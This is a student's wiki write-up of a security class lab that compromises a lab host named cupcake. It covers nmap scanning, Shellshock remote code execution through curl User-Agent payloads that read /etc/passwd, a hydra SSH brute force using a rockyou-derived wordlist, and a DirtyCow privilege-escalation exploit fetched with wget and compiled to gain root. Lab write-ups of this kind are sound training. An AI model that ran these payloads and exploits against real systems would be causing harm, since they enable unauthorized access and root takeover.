Activity 4.1 Exploiting Cupcake - FlameSpyro/Tech-Journal GitHub Wiki

Activity 4.1 - Exploiting Cupcake

  • The purpose of this activity is to give you a sense of some of the steps taken to recon, assess, exploit, achieve a foothold and elevate privileges on a system.

Part 1: Active Recon

  • For this part we find that our target is cupcake.shire.org which is at 10.0.5.23. We needed to find more out about this target without getting our hands dirty yet. We do this by checking the top 100 TCP ports to see what the results are.
  • Once we find an activity we run another scan to run a version detection scan.
  • Deliverable 1. Provide a screenshot of your team's version detection scan(s).
  • This is done by entering the following: sudo nmap 10.0.5.23 -A -sV
  • Then sudo nmap 10.0.5.23 -Pn -sV -p 1-100
  • Deliverable 2. Examine any applications that are publicly accessible. What did you find?
  • First off, these are the options used in out commands so far:
  • -Pn treatsall ports as open
  • -sV gives the service and version information
  • -p 1-100 scans the port numbers
  • Ports 22 and 80 are open with OpenSSH 5.3 and Apache version 2.2.15 on each respectively
  • Deliverable 3. You should have the versions of at least two applications. Go ahead and hit the internet and see if your group can find: The operating system (this is easy) and the release (a bit harder). What did you find and how did you find it? Be prepared to share your findings with the rest of the class
  • OpenSSH version 5.3 (protocol 2.0) was on port 22
  • Apache version 2.2.15 (CentOS 6.2) was on port 80

Part 2: Dealing with Targets and Scans

  • Before starting install nmaptocsv is very cool, it allows for nmap scans to be placed in software such as google sheets which we do here.
sudo apt install python3-pip
sudo pip install nmaptocsv
  • Deliverable 4. Provide a screenshot similar to the one below that shows your exported googlesheet of nmap scan data against cupcake. Note, the scan in the demo did not show version detection. See if you can figure out how to do that. You will have at least two ports.
  • This can be done by
cat top100.txt
nmaptocsv -i top100.txt -d ","

Part 3: Vulnerability Detection

  • Deliverable 5. What potential remote vulnerabilities did your team find?
  • We found that the webserver mostly uses perl duo to the cgi-bin status folder as well it is a Centos box on Apache httpd 2.2.15 using as well OpenSSH and Apache Web Server

Part 4: Remote Code Execution Vulnerability

  • Deliverable 6. Using the following screenshot as a point of departure. Determine what the target's running kernel version (you would use the uname command for this). Provide a screenshot that shows the major and minor release of the kernel.
  • The first nmap will run the shellshock exploit and use the whoamicommand
  • sudo nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /usr/bin/whoami" 10.0.5.23
  • The second will use uname which is used to find a specific kernal version
  • sudo nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /bin/uname -a" 10.0.5.23
  • Deliverable 7. The following technique exposes the OS release. Show similar screenshots that show:
  • the contents of /etc/passwd
  • the code behind the status CGI
  • the results of running ifconfig
  • These can be found by using the respective commands
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /car/www/cgi-bin/status' bash -s:'' HTTP://10.0.5.23/cgi-bin/status
curl -H 'User-Agent: () { :; }; echo ; echo ; /sbin/ifconfig' bash -s:'' HTTP://10.0.5.23/cgi-bin/status

Part 5: The foothold

  • Here we build a password list using the zcat command!
  • Deliverable 8. Armed with the contents of /etc/passwd, let's see if we can build a list of likely passwords for the target account. You should end up with 28 passwords in your list. Provide a screenshot that shows how you generated the list as well as the list contents.
  • zcat /usr/share/wordlists/rockyou.txt.gz | grep -i samwise >> passwords.txt cat passwords.txt
  • Time for some BRUTE FORCE!!! here we use hydra to test for passwords against ssh
  • NOTE t prevent further headache add the following line "HostKeyAlgorithms ssh-rsa,ssh-dss" to the /etc/ssh/ssh_config file and then restarted the service.
  • Then run, hydra -l samwise -P passwords.txt 10.0.5.23 -t 4 ssh
  • Time to login with our newly stolen password!
cat user-flag.txt

Part 6: Root Compromise

  • Were in! Now time to get to root!
  • The following spoiler video shows a method for achieving root compromise. Feel free to try others. There is the potential here to break the system. If you've done so, this is ok. You have the power to access this target in vcenter only to revert the snapshot and power it back on again. When using any technique the alters accounts on the system, make sure you use your own unique username so that you don't wipe out someone else's work.
  • In champuser
searchsploit -m 40839
ls
uname -a
  • In samwise
gcc -v
  • Back to champuser
python3 -m http.server 8086
  • In samwise
ls
cd sf
wget http://**yourip**:8086/40839.c
ls
cat 40839.c
gcc 40839.c -o cow -lpthread -lcrypt
ls
./cow
ls /tmp
cat /tmp/passwd.bak
su -firefart // $ will change to # indicating root
id
ls
id
cat root-flag.txt

Summary

  • How you determined the versions of the two services exposed by cupcake?
    • sudo nmap 10.0.5.23 -A -sV gave us OpenSSH version 5.3 (protocol 2.0) and Apache version 2.2.15 (CentOS 6.2)
  • How you dealt with parsing nmap result with nmaptocsv
TARGET=10.0.5.23; sudo nmap -sT -sV --top-ports=100 $TARGET -Pn -oG top100.txt`
nmaptocsv -i top100.txt -d ","
  • Copy to google sheets!
  • The techniques you used to invoke remote code execution
sudo nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /usr/bin/whoami" 10.0.5.23
sudo nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /bin/uname -a" 10.0.5.23
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s:'' HTTP://10.0.5.23/cgi-bin/status
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /car/www/cgi-bin/status' bash -s:'' HTTP://10.0.5.23/cgi-bin/statu
curl -H 'User-Agent: () { :; }; echo ; echo ; /sbin/ifconfig' bash -s:'' HTTP://10.0.5.23/cgi-bin/status
  • The generation of a list of passwords and subsequent ssh bruteforce
zcat /usr/share/wordlists/rockyou.txt.gz | grep -i samwise >> passwords.txt
hydra -l samwise -P passwords.txt 10.0.5.23 -t 4 ssh
ssh [email protected]
  • Transfer of files using python and wget or any other mechanism you chose
    • wget http://**yourip**:8086/40839.cin samwise
  • Compiling and running a privilege escalation exploit
gcc 40839.c -o cow -lpthread -lcrypt
./cow
cat /etc/passwd // you will see the new user firefart at the top
cat /tmp/passwd.bak
su -firefart // $ will change to # indicating root
id
cat root-flag.txt

Final Thoughts

  • This lab was really cool to get my hands on brute forcing into a machine and working up to root! I still need general work on the recon process but outside of that! I think I can do fairly well!